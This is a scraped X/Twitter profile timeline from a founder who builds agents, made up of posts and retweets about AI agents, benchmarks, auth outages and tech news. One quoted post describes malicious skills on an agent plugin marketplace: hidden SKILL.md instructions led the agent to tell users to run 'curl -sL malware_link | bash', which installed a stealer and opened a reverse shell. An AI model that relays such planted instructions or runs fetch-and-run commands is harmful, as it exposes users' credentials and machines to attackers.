Bryce DeFigueiredo

1.8K posts

Bryce DeFigueiredo banner
Bryce DeFigueiredo

Bryce DeFigueiredo

@bdefig

building agents // co-founder https://t.co/mHcbQIGHY9 // techno-optimist and regular optimist

SF Katılım Ekim 2015
439 Takip Edilen463 Takipçiler
Sabitlenmiş Tweet
Bryce DeFigueiredo
Bryce DeFigueiredo@bdefig·
@scottbelsky if there’s one thing we’ve learned from post-internet capital markets, it’s “follow the dopamine”
English
0
0
3
196
Bryce DeFigueiredo
The new thing is “don’t show up to a meeting without a prototype.” No matter your role.
English
0
0
2
92
Bryce DeFigueiredo
@joshu If the model is RLed for engagement, it’s going to take an incredible amount of willpower from OpenAI not to speedrun to the worst of internet writing.
English
0
0
0
30
Max Weinbach
Max Weinbach@mweinbach·
This laptop comes with 1.1TB of storage 128GB SSD 1TB OneDrive storage (only for a year) This is just insane
Max Weinbach tweet media
English
529
443
18.3K
1.4M
Jamin Ball
Jamin Ball@jaminball·
Awesome job by the @databricks team My summary: They trained a model called KARL that beats Claude 4.6 and GPT 5.2 on enterprise knowledge tasks (searching docs, cross-referencing info, answering questions over internal data), at ~33% lower cost and ~47% lower latency. The key insight: instead of throwing expensive frontier models at enterprise search, you can use reinforcement learning on synthetic data to train a smaller model that's faster, cheaper, AND better at the specific task. RL went beyond making the model more accurate. I t learned to search more efficiently (fewer wasted queries, better knowing when to stop searching and commit to an answer). They're opening this RL pipeline to Databricks customers so they can build their own custom RL-optimized agents for high-volume workloads. I think we'll continue to see data platforms become agent platforms. Databricks' KARL paper is really an agent platform play. The pitch: you already store your enterprise data in the Lakehouse, now Databricks will train a custom RL agent that searches and reasons over it, tuned specifically for your highest-volume workloads (workloads = apps = agents). The business move is closing the loop: data storage → retrieval → custom agent training → serving, all on Databricks. They're turning "your data lives here" into "your agents live here too." Kudos @alighodsi @matei_zaharia @rxin
Databricks AI Research@DbrxMosaicAI

Meet KARL: a faster agent for enterprise knowledge, powered by custom reinforcement learning (now in preview). Enterprise knowledge work isn’t just Q&A. Agents need to search for documents, find facts, cross-reference information, and reason over dozens or hundreds of steps. KARL (Knowledge Agent via Reinforcement Learning) was built to handle this full spectrum of grounded reasoning tasks. The result: frontier-level performance on complex knowledge workloads at a fraction of the cost and latency of leading proprietary models. These advances are already making their way into Agent Bricks, improving how knowledge agents reason over enterprise data. And Databricks customers can apply the same reinforcement learning techniques used to train KARL to build custom agents for their own enterprise use cases. Read the research → databricks.com/sites/default/… Blog: databricks.com/blog/meet-karl…

English
32
94
1.2K
369.8K
Freefall
Freefall@no_chutes·
@Austen I started an ancestry search a few years ago. I got one name back to the 1300s. All copied into spreadsheets because I couldn't find a good app or website, any luck there?
English
2
0
0
216
Bryce DeFigueiredo
Bryce DeFigueiredo@bdefig·
I think there are a couple takes one could have: 1) We’re still so early. Models have a long way to go and current benchmarks capture just a sliver of what matters. 2) (The OpenClaw approach) There are lots of problems that “aren’t coding problems,” but if an agent is clever enough, it can write code to solve them. Even ad hoc, ephemeral, task-specific code. It’s probably a mix of both. My sense is that there’s a lot of juice to squeeze out of number 2.
English
1
0
0
20
Avni
Avni@APatelThompson·
This is one of the most important questions I'm continuing to dig into. From my experience building Milo to take on the mundane family management task for parents, there are important persistent gaps between the supposed capabilities and the actual results on complex everday tasks. This is especially true in areas of work that lean more towards "care" tasks that have more underlying tacit, non-language components... I've started digging into the benchmarks question - but interested in anyone else digging into this.
Ethan Mollick@emollick

What a great illustration of the central problem of AI benchmarking for real work All of the effort is going into benchmarking for coding, but that is a small part of the actual jobs people do, which leaves the true trajectory of AI progress less clear. arxiv.org/pdf/2603.01203

English
1
0
1
357
Nayrhit B
Nayrhit B@NayrhitB·
The exact pitch deck that helped us raise a $9M Seed Round copy whatever you want VCs that invested: → @SusquehannaVC (led) → @LightspeedIndia@BCapitalGroup → Seaborne Capital → @beenextVC@sparrowcapvc@2point2club joined. fundraising is hard enough without guessing what investors want to see. so - I'm making our deck public. if you're raising right now, take it and make it yours. Reply 'deck' + follow (so I can DM it over)
Nayrhit B tweet media
English
2.3K
112
1.7K
191K
nico
nico@nicochristie·
My mom is way too online
nico tweet media
English
10
1
262
14.7K
Bryce DeFigueiredo
Bryce DeFigueiredo@bdefig·
@gilbert I always assume these shots are mostly CGI. Amazing to see how much is done with atoms, not just bits.
English
0
0
2
49
Ben Gilbert
Ben Gilbert@gilbert·
I remember thinking how insane this shot was when I watched it So cool to see behind the scenes.
Ben Stiller@BenStiller

Last 4 year #severance anniversary drop… this is probably out in the world already… but… first shot of season 2💙💚

English
4
0
42
9K
Bryce DeFigueiredo
Bryce DeFigueiredo@bdefig·
@gill_kyle @andrewdex Oh cool, interested to see how it goes! A few months ago, I would have said no way to agent-coding auth, but these things are so good now that it could probably work.
English
0
0
0
9
Kyle Gill
Kyle Gill@gill_kyle·
Really seriously considering it now, looks like it could work with some lightweight mapping logic. With Claude & Codex pulling some serious weight I think this could go fast. Looking at 2 examples with pure python monolith and another with better-auth. Probably will put an agent-team/ralph-wiggum at each
English
1
0
0
18
Kyle Gill
Kyle Gill@gill_kyle·
"Degraded" performance 😅 None of our customers can log into our app and we can't event log in to their app to try and see what's going on!
Kyle Gill tweet media
Kyle Gill@gill_kyle

All our services running on @clerk are returning 429's - Rate exceeded, seeing the same things on other sites running Clerk... Including Clerk itself:

English
9
2
62
15.7K
Kyle Gill
Kyle Gill@gill_kyle·
@bdefig @andrewdex currently digging in deep, we have a unique setup on python/singlestore so I'm trying to decide if the juice is worth the squeeze to run a whole new microservice instead of build it into the monolith
English
1
0
0
25
Bryce DeFigueiredo
Bryce DeFigueiredo@bdefig·
@tunguz Seems solvable by the agent, right. Humans use heuristics to decide which apps they can trust. An agent can just read the entire skill.
English
0
0
1
745
Bojan Tunguz
Bojan Tunguz@tunguz·
This is baaaaad.
chiefofautism@chiefofautism

the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life

English
67
122
2.2K
678.5K
Kyle Gill
Kyle Gill@gill_kyle·
@andrewdex we switched from cognito a while back, probably gonna roll our own 😭
English
2
0
3
426
Rex
Rex@l998412318·
@perrikaryal There's actually a real world application for this. Imagine using this tech in space, but instead of a stick to control, it's a gyro always pointing at the floor in zero gravity so your body always orients correctly.
English
11
5
295
14.4K
Perri
Perri@perrikaryal·
I can control your balance I made a device that sends DC current through my head to stimulate my vestibular nerve (called galvanic vestibular stimulation or GVS) and, in doing so, can make me feel completely destabilised. By changing the direction of the current, it can make me fall in that direction. Hook that up to keyboard controls or a joystick, and suddenly you could have your own remote control human. Naturally, my first thought was man I wanna play trackmania with this. What else should I do? I do not have enough self-preservation, clearly lol #gvs #technology #science #trackmania
English
221
680
7.4K
481.7K
M.G. Siegler
M.G. Siegler@mgsiegler·
They’re roping me into this Super Bowl... (UNC can join this amazing list if Drake Maye wins — thanks to James Polk). #GoBlue 🏈
M.G. Siegler tweet media
English
1
0
3
2.2K
Members of Technical Staff
we asked @tszzl about X starterpacks: "i hate it" "we had this concept of illegibility. stay vague and weird so people can't label you and attack you based on that label." "then here is this starterpack where these 20 accounts are this label." "it probably is a good growth hack"
English
18
0
108
108.8K
“paula”
“paula”@paularambles·
the @Anthropic handle being owned by a guy who only posts his wordles is my favorite form of AI safety
“paula” tweet media
English
82
188
9.1K
323.4K